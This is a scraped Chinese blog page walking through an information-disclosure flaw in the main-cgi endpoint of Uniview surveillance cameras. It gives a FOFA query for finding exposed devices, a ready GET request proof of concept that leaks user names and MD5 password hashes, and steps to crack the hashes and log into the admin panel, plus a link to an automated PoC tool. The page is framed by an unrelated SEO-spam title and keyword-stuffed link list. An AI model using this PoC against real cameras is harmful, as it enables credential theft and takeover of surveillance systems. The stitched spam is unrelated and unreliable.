当前位置: 首页 > news >正文

优秀企业网站的特点java培训班

优秀企业网站的特点,java培训班,服务器注册,淘宝官网首页网址宇视科技视频监控 main-cgi 文件信息泄露漏洞 一、产品简介二、漏概述三、复现环境四、漏洞检测手工抓包自动化检测 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#…

宇视科技视频监控 main-cgi 文件信息泄露漏洞

  • 一、产品简介
  • 二、漏概述
  • 三、复现环境
  • 四、漏洞检测
    • 手工抓包
    • 自动化检测

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。
在这里插入图片描述

二、漏概述

宇视(Uniview)高清网络摄像机存在信息泄露漏洞,攻击者可以通过解密泄露信息获取管理员账号密码,登陆后台控制整个系统,最终导致系统处于极度不安全状态。

三、复现环境

FOFA: app=“uniview-视频监控”

在这里插入图片描述

四、漏洞检测

POC

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}" HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

手工抓包

如果回显200 ok,并且能看到有UserName关键字的,说明成功

在这里插入图片描述
我们也可以看到,密码部分是md5加密的,需要去解密

在这里插入图片描述
直接登录后台

在这里插入图片描述
如果你遇到了插件异常

请直接使用IE浏览器访问

自动化检测

小龙POC这里依然还是顶着干
小龙POC开源传送门: 小龙POC工具

小龙POCexe传送门: 小龙POC工具

在这里插入图片描述

http://www.hrbkazy.com/news/55909.html

相关文章:

  • 做网站的技术关键搜索引擎优化公司
  • 政府网站功能外包推广服务
  • 软装设计合同模板seo自然搜索优化排名
  • 公司网站简介怎么做重庆seo排名电话
  • 如何查询在建项目珠海百度关键字优化
  • 江门网站自助建站搜索引擎营销的主要方式有哪些?
  • 抖音代运营找客户话术简阳seo排名优化课程
  • 网站备案后可以改名吗国内疫情最新消息
  • 手机虚拟空间seo网络优化公司哪家好
  • 网站SEO建设新手如何找cps推广渠道
  • 福建省网站备案用户注销(删除)备案申请表东莞网络优化公司
  • 温州做网站建设深圳市seo上词贵不贵
  • 网站过期后多长时间不续费就完了微信搜一搜seo
  • 自己在公司上班做网站宣传 侵权吗seo优化网站推广全域营销获客公司
  • 长沙网站制作收费明细seo网站推广方式
  • 做如美团式网站要多少钱品牌定位
  • 潍城区建设局网站下载百度app下载
  • 乐陵市人民医院广州优化营商环境条例
  • b2b网站建设怎么做常见的网络直接营销有哪些
  • 小程序建站模板成都搜狗seo
  • 上海热门事件北京seo排名厂家
  • 做外贸哪些b2b网站比较有效客户引流的最快方法是什么
  • 在哪个网站里下载的图片可以做展架seo推广多少钱
  • 云主机购买武汉网站seo公司
  • 如何根据网址攻击网站竞价外包
  • 网站图怎么做才能小而清晰度化妆品软文推广范文
  • 佛山信息技术网站开发可口可乐网络营销案例
  • 电子商务网站设计说明百度关键词怎么做排名
  • 海珠做网站浏览器打开是2345网址导航
  • 南山做网站哪家好网站平台有哪些